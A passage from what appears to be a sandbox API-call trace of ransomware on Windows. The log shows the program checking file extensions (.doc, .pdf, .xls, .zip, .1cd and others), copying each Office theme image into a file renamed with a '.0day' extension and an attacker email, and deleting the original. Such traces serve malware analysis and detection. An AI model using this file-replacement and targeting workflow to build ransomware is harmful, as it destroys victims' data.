Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.554] lstrlenW (lpString=".dbf") returned 4 [0046.554] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.554] lstrlenW (lpString=".1cd") returned 4 [0046.554] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.555] lstrlenW (lpString=".jpg") returned 4 [0046.555] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.555] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.555] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.555] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=3611) returned 1 [0046.555] CloseHandle (hObject=0x198) returned 1 [0046.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 0x20 [0046.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.555] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.556] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0047.353] GetLastError () returned 0x0 [0047.353] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xe1b, lpOverlapped=0x0) returned 1 [0047.392] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe20, lpOverlapped=0x0) returned 1 [0047.395] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.396] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.396] SetEndOfFile (hFile=0x1d8) returned 1 [0047.396] CloseHandle (hObject=0x1d8) returned 1 [0047.396] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.396] SetEndOfFile (hFile=0x198) returned 1 [0047.397] CloseHandle (hObject=0x198) returned 1 [0047.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.397] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 1 [0047.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.397] lstrlenW (lpString=".doc") returned 4 [0047.397] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.397] lstrlenW (lpString=".docx") returned 5 [0047.397] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.397] lstrlenW (lpString=".pdf") returned 4 [0047.398] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.398] lstrlenW (lpString=".xls") returned 4 [0047.398] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.398] lstrlenW (lpString=".xlsx") returned 5 [0047.398] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.398] lstrlenW (lpString=".ppt") returned 4 [0047.398] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.398] lstrlenW (lpString=".zip") returned 4 [0047.398] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.398] lstrlenW (lpString=".rar") returned 4 [0047.398] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.398] lstrlenW (lpString=".bz2") returned 4 [0047.398] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.398] lstrlenW (lpString=".7z") returned 3 [0047.398] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.398] lstrlenW (lpString=".dbf") returned 4 [0047.398] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.398] lstrlenW (lpString=".1cd") returned 4 [0047.398] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.398] lstrlenW (lpString=".jpg") returned 4 [0047.398] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.398] lstrlenW (lpString=".doc") returned 4 [0047.398] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.398] lstrlenW (lpString=".docx") returned 5 [0047.398] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.398] lstrlenW (lpString=".pdf") returned 4 [0047.398] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.399] lstrlenW (lpString=".xls") returned 4 [0047.399] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.399] lstrlenW (lpString=".xlsx") returned 5 [0047.399] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.399] lstrlenW (lpString=".ppt") returned 4 [0047.399] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.399] lstrlenW (lpString=".zip") returned 4 [0047.399] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.399] lstrlenW (lpString=".rar") returned 4 [0047.399] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.399] lstrlenW (lpString=".bz2") returned 4 [0047.399] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.399] lstrlenW (lpString=".7z") returned 3 [0047.399] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.399] lstrlenW (lpString=".dbf") returned 4 [0047.399] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.399] lstrlenW (lpString=".1cd") returned 4 [0047.399] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.399] lstrlenW (lpString=".jpg") returned 4 [0047.399] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.399] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0047.399] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.399] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.579] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=21812) returned 1 [0047.579] CloseHandle (hObject=0x16c) returned 1 [0047.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 0x20 [0047.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.579] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.580] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.580] GetLastError () returned 0x0 [0047.580] ReadFile (in: hFile=0x16c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x5534, lpOverlapped=0x0) returned 1 [0047.582] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x5540, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x5540, lpOverlapped=0x0) returned 1 [0047.583] ReadFile (in: hFile=0x16c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.583] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.583] SetEndOfFile (hFile=0x198) returned 1 [0047.583] CloseHandle (hObject=0x198) returned 1 [0047.583] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.583] SetEndOfFile (hFile=0x16c) returned 1 [0047.584] CloseHandle (hObject=0x16c) returned 1 [0047.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.585] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 1 [0047.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.585] lstrlenW (lpString=".doc") returned 4 [0047.585] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.585] lstrlenW (lpString=".docx") returned 5 [0047.585] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.585] lstrlenW (lpString=".pdf") returned 4 [0047.585] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.585] lstrlenW (lpString=".xls") returned 4 [0047.585] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.585] lstrlenW (lpString=".xlsx") returned 5 [0047.585] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.585] lstrlenW (lpString=".ppt") returned 4 [0047.585] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.585] lstrlenW (lpString=".zip") returned 4 [0047.585] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.585] lstrlenW (lpString=".rar") returned 4 [0047.585] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.585] lstrlenW (lpString=".bz2") returned 4 [0047.585] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.585] lstrlenW (lpString=".7z") returned 3 [0047.585] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.585] lstrlenW (lpString=".dbf") returned 4 [0047.585] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.586] lstrlenW (lpString=".1cd") returned 4 [0047.586] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.586] lstrlenW (lpString=".jpg") returned 4 [0047.586] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.586] lstrlenW (lpString=".doc") returned 4 [0047.586] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.586] lstrlenW (lpString=".docx") returned 5 [0047.586] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.586] lstrlenW (lpString=".pdf") returned 4 [0047.586] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.586] lstrlenW (lpString=".xls") returned 4 [0047.586] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.586] lstrlenW (lpString=".xlsx") returned 5 [0047.586] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.586] lstrlenW (lpString=".ppt") returned 4 [0047.586] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.586] lstrlenW (lpString=".zip") returned 4 [0047.586] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.586] lstrlenW (lpString=".rar") returned 4 [0047.586] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.586] lstrlenW (lpString=".bz2") returned 4 [0047.586] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.586] lstrlenW (lpString=".7z") returned 3 [0047.586] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.586] lstrlenW (lpString=".dbf") returned 4 [0047.586] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.586] lstrlenW (lpString=".1cd") returned 4 [0047.586] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0047.587] lstrlenW (lpString=".jpg") returned 4 [0047.587] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.587] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0047.587] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.587] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=42453) returned 1 [0047.587] CloseHandle (hObject=0x16c) returned 1 [0047.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 0x20 [0047.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.587] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.587] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.588] GetLastError () returned 0x0 [0047.588] ReadFile (in: hFile=0x16c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xa5d5, lpOverlapped=0x0) returned 1 [0047.590] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xa5e0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xa5e0, lpOverlapped=0x0) returned 1 [0047.592] ReadFile (in: hFile=0x16c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.592] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.592] SetEndOfFile (hFile=0x198) returned 1 [0047.592] CloseHandle (hObject=0x198) returned 1 [0047.592] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.592] SetEndOfFile (hFile=0x16c) returned 1 [0047.593] CloseHandle (hObject=0x16c) returned 1 [0047.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.594] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 1 [0047.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.594] lstrlenW (lpString=".doc") returned 4 [0047.594] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.594] lstrlenW (lpString=".docx") returned 5 [0047.594] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.594] lstrlenW (lpString=".pdf") returned 4 [0047.594] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.594] lstrlenW (lpString=".xls") returned 4 [0047.594] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.594] lstrlenW (lpString=".xlsx") returned 5 [0047.594] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.594] lstrlenW (lpString=".ppt") returned 4 [0047.594] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.594] lstrlenW (lpString=".zip") returned 4 [0047.594] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.594] lstrlenW (lpString=".rar") returned 4 [0047.594] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.594] lstrlenW (lpString=".bz2") returned 4 [0047.594] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.595] lstrlenW (lpString=".7z") returned 3 [0047.595] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.595] lstrlenW (lpString=".dbf") returned 4 [0047.595] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.595] lstrlenW (lpString=".1cd") returned 4 [0047.595] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.595] lstrlenW (lpString=".jpg") returned 4 [0047.595] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.595] lstrlenW (lpString=".doc") returned 4 [0047.595] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.595] lstrlenW (lpString=".docx") returned 5 [0047.595] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.595] lstrlenW (lpString=".pdf") returned 4 [0047.595] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.595] lstrlenW (lpString=".xls") returned 4 [0047.595] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.595] lstrlenW (lpString=".xlsx") returned 5 [0047.595] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.595] lstrlenW (lpString=".ppt") returned 4 [0047.595] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.595] lstrlenW (lpString=".zip") returned 4 [0047.595] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.595] lstrlenW (lpString=".rar") returned 4 [0047.595] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.595] lstrlenW (lpString=".bz2") returned 4 [0047.595] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.595] lstrlenW (lpString=".7z") returned 3 [0047.596] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.596] lstrlenW (lpString=".dbf") returned 4 [0047.596] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned 